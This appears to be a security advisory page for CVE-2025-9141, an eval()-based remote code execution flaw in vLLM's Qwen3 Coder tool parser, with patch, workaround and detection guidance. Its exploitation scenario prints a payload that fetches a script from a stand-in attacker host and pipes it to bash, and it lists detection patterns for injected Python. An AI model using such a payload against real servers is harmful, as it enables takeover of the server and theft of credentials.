CVE-2025-9141: vLLM: RCE via eval() in Qwen3 Coder tool parser

GHSA-79j6-g2m3-jgfw HIGH
Published August 21, 2025
CISO Take

If you run vLLM >=0.10.0 with Qwen3 Coder and tool calling enabled, any authenticated API user can execute arbitrary code on your inference server — patch to 0.10.1.1 immediately. As an immediate workaround, remove --enable-auto-tool-choice and --tool-call-parser qwen3_coder from your startup config. Inference servers typically run with broad internal access and hold sensitive credentials, making post-exploitation blast radius severe.

Risk Assessment

High severity (CVSS 8.8). Exploitability is high: network-accessible, low complexity, requires only standard API authentication with no elevated privileges or user interaction needed. LLM inference servers commonly hold API keys, model weights, and internal network access. vLLM is a widely-deployed inference backbone across enterprise and cloud AI stacks, broadening exposure significantly.

Affected Systems

Package Ecosystem Vulnerable Range Patched
vllm pip >= 0.10.0, < 0.10.1.1 0.10.1.1
78.9K 126 dependents Pushed 6d ago 56% patched ~32d to patch Full package profile →

Do you use vllm? You're affected.

Severity & Risk

CVSS 3.1
8.8 / 10
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Moderate

Attack Surface

AV AC PR UI S C I A
AV Network
AC Low
PR Low
UI None
S Unchanged
C High
I High
A High

Recommended Action

5 steps
  1. PATCH

    Upgrade vllm to >=0.10.1.1 immediately on all inference nodes.

  2. WORKAROUND (if patching is delayed): Remove --enable-auto-tool-choice and --tool-call-parser qwen3_coder flags from all startup configs and restart services.

  3. NETWORK

    Restrict vLLM API access to trusted internal clients only; never expose inference endpoints to the public internet without strong authentication and IP allowlisting.

  4. DETECT

    Audit API request logs for tool call parameters containing Python syntax patterns (parentheses, 'import', 'os.', 'subprocess.', '__') as exploitation indicators.

  5. VERIFY

    Audit all running vLLM versions with 'pip show vllm' across inference nodes.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Art.15 - Accuracy, Robustness and Cybersecurity
ISO 42001
A.6.2 - AI System Operation and Monitoring
NIST AI RMF
MANAGE-2.2 - Mechanisms for AI Risk Treatment
OWASP LLM Top 10
LLM02 - Insecure Output Handling LLM05 - Supply Chain Vulnerabilities LLM07 - Insecure Plugin Design

Frequently Asked Questions

What is CVE-2025-9141?

If you run vLLM >=0.10.0 with Qwen3 Coder and tool calling enabled, any authenticated API user can execute arbitrary code on your inference server — patch to 0.10.1.1 immediately. As an immediate workaround, remove --enable-auto-tool-choice and --tool-call-parser qwen3_coder from your startup config. Inference servers typically run with broad internal access and hold sensitive credentials, making post-exploitation blast radius severe.

Is CVE-2025-9141 actively exploited?

No confirmed active exploitation of CVE-2025-9141 has been reported, but organizations should still patch proactively.

How to fix CVE-2025-9141?

1. PATCH: Upgrade vllm to >=0.10.1.1 immediately on all inference nodes. 2. WORKAROUND (if patching is delayed): Remove --enable-auto-tool-choice and --tool-call-parser qwen3_coder flags from all startup configs and restart services. 3. NETWORK: Restrict vLLM API access to trusted internal clients only; never expose inference endpoints to the public internet without strong authentication and IP allowlisting. 4. DETECT: Audit API request logs for tool call parameters containing Python syntax patterns (parentheses, 'import', 'os.', 'subprocess.', '__') as exploitation indicators. 5. VERIFY: Audit all running vLLM versions with 'pip show vllm' across inference nodes.

What systems are affected by CVE-2025-9141?

This vulnerability affects the following AI/ML architecture patterns: LLM inference serving, agent frameworks, tool-enabled LLM pipelines, agentic AI platforms, multi-tenant AI API services.

What is the CVSS score for CVE-2025-9141?

CVE-2025-9141 has a CVSS v3.1 base score of 8.8 (HIGH).

Technical Details

NVD Description

### Summary An unsafe deserialization vulnerability allows any authenticated user to execute arbitrary code on the server if they are able to get the model to pass the code as an argument to a tool call. ### Details vLLM's [Qwen3 Coder tool parser](https://github.com/vllm-project/vllm/blob/main/vllm/entrypoints/openai/tool_parsers/qwen3coder_tool_parser.py) contains a code execution path that uses Python's `eval()` function to parse tool call parameters. This occurs during the parameter conversion process when the parser attempts to handle unknown data types. This code path is reached when: 1. Tool calling is enabled (`--enable-auto-tool-choice`) 2. The qwen3_coder parser is specified (`--tool-call-parser qwen3_coder`) 3. The parameter type is not explicitly defined or recognized ### Impact Remote Code Execution via Python's `eval()` function.

Exploitation Scenario

An adversary with valid but low-privileged API credentials (stolen service account, malicious insider, or compromised client in a multi-tenant deployment) sends a crafted tool call request to a vLLM endpoint running Qwen3 Coder. The tool call includes a parameter with an unrecognized or ambiguous type, triggering the parser's eval() fallback path. The adversary injects a payload such as __import__('os').system('curl attacker.com/shell.sh | bash') as the parameter value. This executes on the inference server under the process owner's privileges, enabling credential theft, internal network pivoting, model weight exfiltration, or persistent backdoor installation.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Timeline

Published
August 21, 2025
Last Modified
August 21, 2025
First Seen
March 24, 2026

Related Vulnerabilities